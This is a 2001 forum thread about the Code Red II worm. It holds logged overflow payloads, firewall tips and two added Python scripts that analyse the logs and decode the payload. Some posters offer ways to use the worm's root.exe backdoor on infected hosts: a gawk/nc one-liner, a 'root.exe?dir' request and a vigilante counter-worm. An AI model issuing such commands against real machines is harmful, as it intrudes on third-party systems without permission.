Code Red Back For More
Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different from the original and far more dangerous. CR2-infected servers only attack servers within their Class A address block, and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.
Can you either post the source, or a link to the source? I'd like to do the same (I have over 350)
Thanks
In the last ten minutes:
[Sat Aug 4 19:50:03 2001] [error] [client 24.45.135.139] File does not exist: /var/www/default.ida
[Sat Aug 4 19:50:18 2001] [error] [client 24.10.20.81] File does not exist: /var/www/default.ida
[Sat Aug 4 19:51:30 2001] [error] [client 24.43.198.115] File does not exist: /var/www/default.ida
[Sat Aug 4 19:58:09 2001] [error] [client 24.102.17.144] File does not exist: /var/www/default.ida
[Sat Aug 4 19:59:18 2001] [error] [client 24.190.160.240] File does not exist: /var/www/default.ida
This page logs the Code Red attacks (both versions) against an AT&T @Home user. At the time of writing, this server has already been attacked by Code Red II over 440 times!
I just checked my server, which saw very little code red activity. 33 attacks today, way beyond anything I saw before.
Chuq Von Rospach, Internet Gnome = When his IQ reaches 50, he should sell
..it overruns an un-checked buffer to overwrite a privileged subroutine in memory..
does anybody remember how the cornell finger worm worked?
You just know ISPs like @home are going to start blocking port 80 because of this. Kudos microsoft and some of their users (in all fairness, probably a small minority of them) for wrecking the web for the rest of us.
Click on "Reply to this" just below the story. If you are wanting to submit a story, well... good luck!
political_news.c: warning: comparison is always true due to limited range of data type
route del default
Or however you do it with the NT route command.
set nat enable
set nat entry add [insert outside ip here] 80 10.255.255.200 17000 tcp
write
exit
Or, you could add a filter to deny incoming traffic on port 80.
I already have more hits for codered II than I did for the original.
Does it spread differently / attack more often?
Or is the random number generator better than in the original?
root@beethoven:/usr/local/apache/logs# grep default.ida access_log | wc -l
254
root@beethoven:/usr/local/apache/logs# grep NNNNNNNNNN access_log | wc -l
119
root@beethoven:/usr/local/apache/logs# grep XXXXXXXXXX access_log | wc -l
135
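The greps above count the two probe strings by hand. As an added example (not code from the thread or any of its posters), here is a small Python log analyser that does the same over Apache common-log lines and additionally splits each variant by whether the source sits in the server's own /8 ("Class A") or /16 ("Class B"), which is the locality Brian Stretch describes at the top of the page. The log lines are constructed for the example, modelled on the hits quoted in the thread, and the server's own address 24.20.5.7 is an assumption.

```python
import re
from collections import Counter, defaultdict

# Apache common log format: client ident user [time] "request" status bytes
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

# The %u tail is the worm's as quoted in the thread; the filler run is
# shortened so the constructed sample stays readable.
CR2_QUERY = ("/default.ida?" + "X" * 32 +
             "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
             "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3"
             "%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
CR1_QUERY = CR2_QUERY.replace("X", "N")

# Constructed sample access_log (not a real capture).
SAMPLE_LOG = "\n".join([
    f'24.10.20.81 - - [04/Aug/2001:19:50:18 -0400] "GET {CR2_QUERY} HTTP/1.0" 404 281',
    f'24.43.198.115 - - [04/Aug/2001:19:51:30 -0400] "GET {CR2_QUERY} HTTP/1.0" 404 281',
    f'24.20.77.3 - - [04/Aug/2001:19:53:02 -0400] "GET {CR2_QUERY} HTTP/1.0" 404 281',
    f'213.123.150.110 - - [04/Aug/2001:19:55:41 -0400] "GET {CR2_QUERY} HTTP/1.0" 404 281',
    f'4.60.251.194 - - [04/Aug/2001:19:56:12 -0400] "GET {CR1_QUERY} HTTP/1.0" 400 330',
    f'24.20.77.3 - - [04/Aug/2001:19:58:09 -0400] "GET {CR2_QUERY} HTTP/1.0" 404 281',
    '65.10.3.9 - - [04/Aug/2001:19:58:30 -0400] "GET /index.html HTTP/1.0" 200 1043',
    f'61.77.78.28 - - [04/Aug/2001:19:59:18 -0400] "GET {CR2_QUERY} HTTP/1.0" 404 281',
])


def parse_line(line):
    """Split one common-log line into its fields, or return None if it does not parse."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    src, when, request, status, _size = m.groups()
    return {"src": src, "when": when, "request": request, "status": int(status)}


def classify(request):
    """Name the worm variant a request line looks like, or None for ordinary traffic.

    The July worm pads the overflow with 'N'; Code Red II pads it with 'X'.
    """
    if "/default.ida?" not in request:
        return None
    query = request.split("/default.ida?", 1)[1]
    if query.startswith("XXXX"):
        return "CodeRedII"
    if query.startswith("NNNN"):
        return "CodeRed"
    return "default.ida-other"


def locality(src, my_ip):
    """Place a source relative to our own address: same /16, same /8, or elsewhere."""
    s, m = src.split("."), my_ip.split(".")
    if s[:2] == m[:2]:
        return "same /16"
    if s[0] == m[0]:
        return "same /8"
    return "elsewhere"


def summarize(log_text, my_ip):
    """Count worm probes per variant, per locality within each variant, and per source."""
    variants = Counter()
    by_locality = defaultdict(Counter)
    sources = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        variant = classify(rec["request"])
        if variant is None:
            continue
        variants[variant] += 1
        by_locality[variant][locality(rec["src"], my_ip)] += 1
        sources[rec["src"]] += 1
    return {"variants": variants, "locality": dict(by_locality), "top_sources": sources}


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG, "24.20.5.7")
    for variant, n in report["variants"].items():
        print(f"{variant}: {n} probes, by locality {dict(report['locality'][variant])}")
    print("busiest sources:", report["top_sources"].most_common(3))
```

Feed it a real access_log (`summarize(open("access_log").read(), your_ip)`) and the per-source counter also answers the question raised later in the thread about the same infected hosts scanning a machine repeatedly.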
Ahh. Sorry for the mistake. I'm just a linux bum. I can't afford that expensive Windows junk.
Dozings.com -- Its kinda funny... If you're as crazy as me.
Damn, I miss that 'Hacked by Chinese' stuff.. reminds me of sushi.. hmm.. sushi..
Well, at least it was for a "good" cause.. it makes the worm smaller and faster to spread, because the victim doesn't know that he's infected, letting the worm scan more hosts..
A witty saying proves nothing. --Voltaire
th3y 0wnz j000!!@#?!>$@?!$>!-`!?
144 hits for me so far. Good ol' apache...
http://www.genotrance.com/red.html
I can handle a limited number of requests.
I'm running 2.4.2 with no hangs. Cisco made me jump through hoops to get the upgrade.
Anyone from Cisco know why Cisco makes it so hard for customers?
Bush's education improvements were
Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.
Interesting dilemma... how exactly are these people going to get the patches to be installed with the system unplugged? Microsoft is going to have to release a patch CD.
"And like that
One reason that they might have changed to "XXXX" is that the eEye scanner used "X" instead of "N" to gauge how affected the internet could be.
That or this puppy has been around for longer than we think
I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...
It took only ten minutes before /var/log/apache/access_log came up with:
213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281
Blimey... 10 minutes! This thing is rife!!!
And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).
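What the %u tail of a probe like that actually carries is easier to see once it is decoded. The following is an added example (not code from the thread or its poster): it takes a logged request line, separates the filler run from the %u-encoded part, turns each %uXXXX unit into the two little-endian bytes it occupies once the .ida extension has widened the query string to 16-bit characters, and then reports the NOP count and every value pushed by an x86 `push imm32` (opcode 0x68). The sample request is the one quoted above with the filler shortened to 36 characters; the `push_immediates` scan is a heuristic written for this example, and the repeated 0x7801cbd3 it surfaces is the fixed msvcrt.dll address the worm's overflow returns through, as documented in the public analyses of Code Red.

```python
import re

# A probe as logged by Apache, from the thread above, with the filler run
# shortened from its real length to 36 characters for readability.
PROBE = ("GET /default.ida?" + "X" * 36 +
         "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
         "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3"
         "%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0")

# filler run of N or X, then one or more well-formed %uXXXX units
# (the trailing "%u00=a" is malformed and deliberately not matched)
_QUERY_RE = re.compile(r'/default\.ida\?([NX]+)((?:%u[0-9a-fA-F]{4})+)')


def split_query(request_line):
    """Return (filler, encoded): the N/X run and the %u-encoded part that follows it."""
    m = _QUERY_RE.search(request_line)
    if not m:
        raise ValueError("not a Code Red style default.ida probe")
    return m.group(1), m.group(2)


def decode_u(encoded):
    """Decode %uXXXX units into the UTF-16LE bytes a wide-character buffer receives."""
    units = [int(h, 16) for h in re.findall(r'%u([0-9a-fA-F]{4})', encoded)]
    return b"".join(u.to_bytes(2, "little") for u in units)


def push_immediates(payload):
    """Heuristic: read every 0x68 byte as x86 `push imm32` and return the values pushed."""
    return [int.from_bytes(payload[i + 1:i + 5], "little")
            for i in range(len(payload) - 4) if payload[i] == 0x68]


def analyze(request_line):
    """Summarise one probe: filler size, decoded payload, NOP count, pushed addresses."""
    filler, encoded = split_query(request_line)
    payload = decode_u(encoded)
    return {
        "filler_char": filler[0],
        "filler_len": len(filler),
        "payload_len": len(payload),
        "nop_count": payload.count(0x90),
        "pushed": push_immediates(payload),
        "payload_hex": payload.hex(),
    }


if __name__ == "__main__":
    r = analyze(PROBE)
    print(f"filler: {r['filler_len']} x '{r['filler_char']}'")
    print(f"payload: {r['payload_len']} bytes, {r['nop_count']} NOPs")
    print("pushed:", [hex(v) for v in r["pushed"]])
    print("bytes:", r["payload_hex"])
```

Run against a full-length logged line the filler count comes out at the worm's real value; the decoded bytes are identical for the N and X variants, which is why the two differ only in the padding character the poster above noticed.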
I've been thinking about this.. We ran a very tight routing configuration at my last job (not vouching for the software).. using PIX we severely locked down inbound traffic flow, but had to manage inbound email and Websphere access to mainframe databases.
I wonder about much smaller organizations that might dual-home an NT box with 192.168 on one side and their registered address on the other. Granted, a Linksys would go a long way, but I'm sure many of these tiny firms don't have someone to go to for little tidbits like that.
I almost feel bad for those entities. You would think a small business may not be able to pay extravagant fees for software, but instead of going with free software (which is certainly more difficult to configure) they instead choose to pirate the shoddy MS garbageware. Now they're suffering greatly as a direct result of the choices they made.
The way I see it, though, is kinda like feeling bad for West Virginians who rebuild their homes in the same place after the last one was washed away by a flood. I just can't feel bad for their own stupidity.
Intelligent Life on Earth
There are just too many IIS installations that are run by people who either don't know what they are doing or worse don't even know what IIS or a web server is. That's the problem with these "idiot-proof" GUI webservers...they can be run by idiots.
It certainly doesn't help that it can take more effort to not install IIS.
arp broadcasts of routers trying to figure out who the f*ck the machine that code red 2 is trying to probe is. if the server doesn't exist, it's broadcasting to your subnet to find out who that IP belongs to..
Naaa... just config your firewall to DENY connections from authorized-scan1.security.home.net (24.0.0.203)
Keeps those pests at bay...
How many hosts will the new strain scan, and does it re-seed its RNG? The reason I ask is that I've noticed that many of the infected hosts that are within my same subnet have scanned my machine upwards of 5-6 times today...
Is each host just limited to a finite number of IPs that it will scan repeatedly, or will it continue to scan the entire Internet if not stopped?
Don't expect every scan to be from an infected computer.. Since CR2 "r00tz" the computer, it might be some skript kiddie trying to get in your computer.. That means that the CR2 worm is worse because it also uses the "evil" and greed in us to cause more trouble to the internet.. So, the idea of running a script that goes through the logs isn't that good..
Anyone with a Cisco Smartnet contract should be able to download the 2.4.2 image for the 67x series. It's up there on the CCO. If your ISP doesn't have a contract you should suggest that they get one if they are going to continue to support Cisco products. If they use Cisco routers and/or switches they may already have one. Try asking.
I've gone and hit the addresses showing up in my logs and I haven't seen the tell-tale 'Hacked by Chinese' message. Seems like the new Code Red also leaves the default site at the IP address alone, making it less obvious that a server is infected. Joy.
Some people have a way with words, and some people, um, thingy.
COMPANYX is infected and scanning. I got several hits from them today..so i hit their website to see who it was. Here's snippet of their propaganda. Go Figure. DARPA (Defense Advanced Research Projects Agency) has recently awarded COMPANYX a contract to develop technology to help the US military effectively respond to strategic threats to the computer networks of the United States government. In particular, COMPANYX will develop tools that can be used to plan courses of action that can counter the threat of widespread, adaptive, coordinated and rapid attacks by exploiting predictive cyberspace knowledge to effectively manipulate the future actions of attackers to the benefit of US cyber defense.
Kangaroo Koncepts
Milo from Kangaroo Koncepts
My first hit from the 'N' variety was:
4.60.251.194 - - [04/Aug/2001:06:26:29 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330 "-" "-"
evrtwa1-ar9-4-60-251-194.vz.dsl.gtei.net
This was at 6:26AM Pacific time. I hope this helps track the bastard...
Michael A. Uman
Sr Software Engineer
softwaremagic.net
That 1 is probably the one that infected you.
The really scary thing is to consider how long CodeRed V2.0 would have gone unnoticed if the probes would have stuck with the "NNNN" series instead of the "XXXX" as the overflow fodder? It took me two cups of coffee this morning (well, ten-ish) to see that I was looking at a page of "X"s. Could it have gone relatively stealthy?
one better than mcleodeight
date = Sun Aug 5 11:42:52 CDT 2001
Linux running apache. The first sign of the XXXX version showed up yesterday:
61.77.78.28 - - [04/Aug/2001:14:01:22 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXX snip
211.36.128.3 - - [04/Aug/2001:23:44:01 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX snip
Wouldn't you know it? nslookup returns non-existent host/domain. Otherwise, we are still getting probed by the NNNN variety about once an hour.
To-do List: Receive telemarketing call during a tornado warning. Check.
I can't believe we haven't /.ed his guestbook!! I was expecting to find about 400 entries saying, "you do realize the entire Internet knows you're a complete moron by now, don't you??"
Intelligent Life on Earth
Essential unix sysadmin text: http://www.admin.com/
"Personal Web Server" on Windows 9x is just a variant of IIS and is probably vulnerable to most IIS bugs. It gets a pass on this one because Index Server is not installed on 9x.
> SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.
For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.
But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.
Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.
The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.
The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).
> I hope no one keeps personal, private, confidential and financial data on their PCs.
The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.
What you could do though, is set up a RunOnce entry in the registry to start Notepad. Then, when the user next logs on, they'll get the message!
Of course, once they reboot, they are no longer infected, but maybe they will patch it.
Yeah.. anyone who is on the computer on the weekends who would be able to do such a thing is a geek, and most geeks would rather see the shit hit the fan than fix it :)
(I know that I'm a little excited to see this happening)
I can't believe people trust their businesses to this crap. That's just too funny.
War is necrophilia.
Absolutely. Never forget that all observed phenomena have direct causal relationships. The one you find the most offensive is always to blame.
Another weird thing the worm did was mess with the weather in Bethesda, MD today. It was hot and sunny around 4:30pm, yet there was a torrential downpour. The sun never went away. Damn worm.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
No, I don't think I did.
You are right, a well set up unix box takes little time to administer if you leave it static. That is the point. What if your client decided they needed to find a distributed FAX server for their office? It's dead simple to find this stuff and install it and that's what they are looking at. They can call me in for my $75 an hour and end up paying far more in the 3 hours I'm there, and the 5 hours I took to research this stuff...not including fielding the service calls when their secretary needs trained how to use it...than if they would have had the secretary use some of her downtime to do a search for FAX SERVER and WINDOWS NT and find something that worked reasonably well. One of the more technical folks in the office slaps in the card, installs the software and then they call me to come in and do a tweak here or there or ask me if the software looked good in the first place.
The fact is computers don't need to be 99.999 for most businesses. I DO know what you mean though: My biz partner who handles most of the creative aspects of the biz, didn't even know that 3 of our boxes we had sitting in our racks were Unix based. All he knew was that these were the machines that he never had to touch. He knows all about Windows as he's had to futz with them all the time. Give him unix and he'd be lost...even if ya threw him into KDE or Gnome (two things you'd never see on any of my servers).
Again, admining a Unix box CAN be cheaper and takes less time, but when I get around to an office once a month, that ain't going to cut it when they need new users added to the system and mail accounts set up...how about a new CGI installed for the webserver...that sorta stuff. Having a geek on call would be perfect, but the cost of a fulltime windows person is still going to be far cheaper than a part time unix person that knows what they are doing.
I'm still doubting if I will run something like this on my machines:
tail -f /var/log/httpd/access_log | gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'
In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.
Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...
This root.exe might be a stepup for causing even more problems at a later time!
Argh, that poses a bit of a moral dilemma for me...
When the first Code Red worm came out, the press gave it so much attention and so little detail, that almost every non-geek person was scared and decided not to come to the Internet on the 1st of this month.. So, on that day, at least for me, NET WAS FASTER!!! yay!!!
My point is, if the press gives as little details about the Code Red II as it did to "The One", net will be faster for some people (as long it DECENTLY attacks the White House homepage)!
Anyways, I was already expecting a CR2 (and expect a CR3, 4, etc.. it will be like Final Fantasy, eh =), but expected it to exploit different vulnerabilities (that's why I think CR2 wasn't made by the same author as the CR1)..
CR WILL be the new worm model that "evil little green (wo)men" (thats what the government wants to believe they are..) will follow.. Imagine that, mass defacement made easy..
Also, just imagine the damage if 4 or 5 of these worms went loose AT THE SAME TIME, exploiting vulnerabilities in many OSes (that way, "evil little green (wo)men" wouldn't have had to build one HUGE worm, just tiny ones that "0wn3d" different OSes/webservers and caused total anarchy for everyone).. Imagine that.. Total chaos..
If a woodchucker could chuck wood, and if it would, how much wood would a woodchucker chuck if he could chuck wood? -- Monkey Island 2
Nope I work with this damn fool and I can verify what happened.
When the lil'kitty-cat-man's main boxen, a dual-P3, crashed, he moved to a backup system, a P2-233, and installed Win2K. He runs a nice little site that no one wants to have \.ed, and apparently either someone complained, he was using too much bandwidth, or @home really did notice. This may have been too early, but what if this was Red II and it made an attempt on an @home server, DHCP, DNS, etc??
But in anycase, he calls @home, they say you running services, bad, you have virus code red, bad, fix and we let you back on, good.
Reboot, shut off IIS, call back, they say must call back during business hours to get reactivated, wait without access for way too long and then call, everything cool.
net send administrator "Your web server is compromised..."
That should pop a message up to a console the admin has logged on to, if the messenger service is running and if they're using the Administrator account (which is likely, they have unpatched IIS boxes hanging out there, eh?).
A more drastic approach would be to spam all workstations with the same command, but I will leave that as an exercise to the reader.
I've seen 344 total now, as of midnight MST.
About 1/3 of those are from the original code red... the "NNN" sequence.
Over 2/3 of them are from Code Red 2, the "XXX" sequence!!
That means that in just one day, i've got over twice as many code red 2's as I have code reds total.
After this whole mess anyone still running IIS is just a fscking moron.
Errrr.... More things named in my honor... This can't be good!
:-P
If worms start popping up with Linux4Green (my ICQ nick) then I know I'm bad luck.
--
CodeRed, the lower user #. No relation to SirCam.
It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.
We'll have full details posted to the Incidents list shortly.
We're still talking about an IIS4/5/PWS vulnerability that just defaces the default web page and trys to propagate itself, right?
-EvilMagnus
OMG.. I just found "Fux_Israel.html" in the root dir of one of the infected hosts.. After opening it, it contained just a blank page.. something tells me that there are numerous defacers using the backdoor to "fuxoring" with the system and installing new backdoors on them.. This CR2 is *really* worse than the first.. Just imagine CR3.. Looks like from now on things will be worse for us (at least the outlook virus will most likely die).. I just don't want to imagine what numerous worms as destructive as this one, but exploiting different vulnerabilities in different webservers, would do.. who knows.. probably that would *really* bring down the internet..
If they checked their logs, they'd see upwards of 300 infections daily anyway. At that point, its difficult for them NOT to be aware of the worm.
More likely is that a lot of the machines are unattended, and/or their users are unaware of even HAVING IIS.
Paranoid
Bwaahahahahaa.
Under "services," they list "firewalls."
Awesome.
A log of attack attempts here over the last 3 days can be found here
The patterns of frequency and source IPs speak for themselves. Interesting to note that I'm continuing to be attacked by both versions of the virus.
Thanks to Apache, they don't achieve anything, but the waste of bandwidth is stupid and annoying.
I'm thinking of getting in touch with doubleclick to negotiate advertising and make some money since my site is suddenly so popular.
give me a
Well I was thinking more along the lines of.
/Y mayhem but whatever floats your boat. The last thing I'd want to do would be actually fix the idiots system.
Industrial espionage, identity theft, blackmail, and general deltree
War is necrophilia.
I tried to visit some of the infected sites in my web log, but most of them gave no response, until I got to http://202.81.246.51 which states: "If you can see this, it means that the installation of the Apache web server software on this system was successful." :)
Actually, root.exe is just a copy of cmd.exe, as can be seen by running a dir on c:\winnt\system32\cmd.exe. The different sizes of cmd.exe probably just mean that this is a slightly different version (service pack) of windows, that's all.
Kiddies wouldn't bother with the IIS exploit, though, it's already been done for them. They would go straight for /scripts/root.exe. So if you just hit every host that sends the default.ida vulnerability, it's a pretty safe bet they're all compromised.
If I'm getting this right, if you just get root.exe all you'll get is a prompt that you can't do anything with. Try doing a get with arguments, like "GET /scripts/root.exe?dir".
In my area, @home can't tell what's out. It takes many hours for an outage to make it onto "the board." If you call before this time, they will make you reboot the computer, reset the modem, etc etc. and then they will schedule a tech to come out. Because, again, let me repeat myself: they have no ability to monitor the network in real-time. I am convinced that "the board" only shows outage data that they collect from outraged customers.
(side note: the idiot techs always make you reboot... even though the modem's ability to sync to the network has NOTHING TO DO with the kind of computer it is attached to, or even indeed if the computer is ON or OFF. Sigh.)
@home is a freaking circus. A monkey house.
I actually prefer it that way, they are apparently too dense to notice all the servers I run in violation of the TOS.
My machine has received over 250 hits in the last few hours. I have tried to telnet to them (port 25) but most are connection refused. Which port are you supposed to telnet to, and what do you say?
Is there a "shutdown -h now" equivalent with windows?
Should read: Several @Home users reported that everything was moving along normally. Most of their friends giggled and left the room.
one better than mcleodeight
No pop up hell here. But then I have forsaken Java and Javascript. Life is good.
AND he lives on APACHE BLVD!!! now if that's not ironic, smack me.
"Give a man a fire and he's warm for a day, but set fire to him and he's warm for the rest of his life." Terry Pratchett
The reason is that rootkit will be running as a child process of a service, and services are not normally allowed access to the user desktop.
If the IIS W3svc service has been set up to use the LocalSystem account, it is possible to check the "Allow Service to interact with Desktop", but you have to deliberately do this. And it is impossible to grant the LocalSystem account anything more than pleb rights, so almost nobody uses this option. The IUSR_ account is what a default IIS box is configured to use.
What you could do though, is set up a RunOnce entry in the registry to start Notepad. Then, when the user next logs on, they'll get the message!
http://www.netcraft.com/survey/
.Net site spotted
This month's survey also found a site outside of microsoft.com offering Microsoft's .Net services. This is earlier than many people expected, however the site www.empowered.com is a Microsoft Gold Certified Partner and Microsoft itself has several sites using .Net, including uddi.microsoft.com.
First pre release of Windows .Net Server becoming quite widely deployed
There are already between six and seven hundred sites running Microsoft-IIS/6.0 and Windows .Net Server, the operating system that will succeed Windows 2000 sometime next year. Windows .Net Server has had little media attention relative to .Net, and there has been no prior reporting of the availability of a pre release, but the sites running the Windows .Net pre-release are spread over several countries.
Around the Net
Microsoft gains around five and a half per cent of web hosts this month, and almost 2% of active sites. Primarily this is a result of two large US installations converting from Solaris.
The large free hosting company Namezero, hosted on the Exodus network, has migrated its front end systems to Windows 2000, as has part of the Network Solutions domain registration system. Network Solutions has moved physically from Digex, to Interland, [where Microsoft held a minority interest, prior to the sale to Micron] as part of the process.
These large installations had previously been masking a general decline in Solaris share on the web, which is now down four percentage points over the last year. Additionally, the Network Solutions site was by far the largest Netscape-Enterprise installation in terms of numbers of hostnames, and one would expect that Netscape-Enterprise overall share will drop towards the 2-2.5% it has in the active sites analysis over the next few months.
Sigged!
Well, it isn't that unlikely that the people that were responsible for these servers were simply fired during the dot-bomb fallout and the people left didn't know or care anything about them and leave them running unattended. I think this is just another reason why you cannot churn out moronic MCSEs into the industry to replace experienced system administrators. Anybody caught dead using IIS after the last 20 root exploits really needs to have their head examined.
25 - 30 per hour here on 24.x.x.x and same on 216.x.x.x.x.
one better than mcleodeight
Mine are all coming in from 65.10.x.x
What the fuck? What the fuck is going on? How the fuck is it that I can have old ladies calling me up at work (tech support for an ISP) and asking if the reason they can't pick up their email is because of the Code Red worm, 'cos they saw the press conference and, hey, they're wondering, and something like 105,000 separate IP addresses are still infected? Did the rapture happen when I wasn't looking, and God took the people responsible for these computers, those left behind couldn't find the passwords anywhere? How is this possible?
(I know, I know; not everyone lives w/in viewing distance of CNN, default installations of MS whatever -- but still, this absolutely amazes me.)
Carousel is a lie!
I'm on a /128 cox at home subnet. It's normally very quiet on my subnet, but since this morning my firewall has been bouncing packets like crazy.
I guess I'm going to have to put a packet sniffer on the other side of the wall and see what the hell is going on with this code red II.
233 attempts so far.
The ONLY thing that @HOME, or at least AT&T@HOME, scans for is the usage of news servers, and I think that is the least of their concerns. I'm sure they won't change their policy (and I hope they don't since I run many other servers off my @HOME connection). It's not the ISP's problem to monitor the usage of their clients unless it results in a bandwidth problem for them, or a legal problem for them providing a client the bandwidth (to use illegally). This still boils down to stupid users, stupid people. I've had over 20 times the amount of hits from this codered II worm than the first codered one last month. It's modified to attack cable modem users specifically, I'd assume, and rightfully so. Maybe it will shed light on the problems with installing microCrap(tm) products.
http://www.codewolf.com - Just good stuff to waste time
...Pick any one.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
ITYM rh 6.2
wget http://64.131.175.145/mp3/index.html
:-)
Probably best to view index.html in a text editor though.
There are 1.1... kinds of people.
According to section 1343.4(d) of the DMCA, I quote: "...an entity may initiate a lawsuit regarding something in CyberSpace: The _Dangerous_ Internet, only if said entity has a net worth of over $500million, is on the list of Government Approved Plaintiffs, they're suing so they can "protect our children from pR0n and h4X0rz", and has brib^H^H^H^H contributed at least $4million to congressional and presidential campaigns during the last two election cycles..." and so forth and so on. You may be SOL unless you work for something on the approved list like the RIAA or MPAA. Sorry :(
Best. Comment. Ever. Enjoy!
Easy. Make it so it isn't a true "worm".
Make it so it patches against the exploit, then routes all attempted re-exploitation to a small CGI that uses the backdoor to disinfect the attacking system, and install the countermeasure.
So...assuming you're getting hit with 30 requests an hour from 30 different IPs -- and each of those 30 is getting hit the same way -- the "fix" could propagate itself like wildfire, without being an "active" worm (seeking out hosts to disinfect), but instead being a "passive" worm (waiting for an infected computer to contact it, then disinfecting that computer, and passing on the "passive" disinfector).
Problem being, it's still modifying the data on someone else's computer, without their knowledge or permission. I believe that makes it illegal -- even if it is working for "good" rather than for "evil".
Actually, the three variants of the initial worms (1 with broken random number generator, 2 with a fixed one) can be considered roughly the same release. Indeed, apart from the obvious fixes, most code was rigorously identical. So, let's call those 1.0, 1.1 and 1.2. However this one is entirely different, apart from the exploit it uses, and the name CodeRedII. Thus the use of version 2.0 does seem to be justified.
c178.h203149139.is.net.tw - - [06/Aug/2001:00:22:44 +0930] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-"
No more "GET", notice.
Now what does this one do?
I found something very very similar to this on another server. It was the index.htm file, not a separate one.
Duh. I never said it was a Class A. A class A network has a 0 as the MSB, and a class B has a one. 128.x.x.x is 10000000.x.x.x in binary. However, the article mentioned that the worm stuck either within its own class A or its own class B, and I was merely commenting on the situation in my own slice of class B heaven.
We don't have a state-run media we have a media-run state.
Holy shit.
In the root directory of the drive there's an HTML file with the "Fuck USA goverment" tag or whatever. I am not doing anymore snooping.
The shit has hit the fan, ladies and gents.
--
Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green? :)) that fixes all the servers before it gets out of hand.
I bet if this was an apache/Linux bug that variant would be out already. Seriously.
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Maybe you should subscribe to the MS Product Security Notification mailing list.
No wonder my dsl is so slow tonight! :)
Winter 2010: With Glowing Hearts
- IBM Instructor -- "Introduction to System/360," circa 2Q 1966
